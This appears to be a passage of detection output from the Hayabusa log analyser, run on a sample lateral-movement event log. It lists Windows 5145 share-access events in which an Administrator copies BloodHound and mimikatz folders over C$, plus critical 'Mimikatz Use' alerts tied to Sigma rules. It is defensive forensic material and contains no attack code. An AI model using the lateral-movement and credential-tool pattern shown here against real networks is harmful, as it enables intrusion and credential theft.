Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 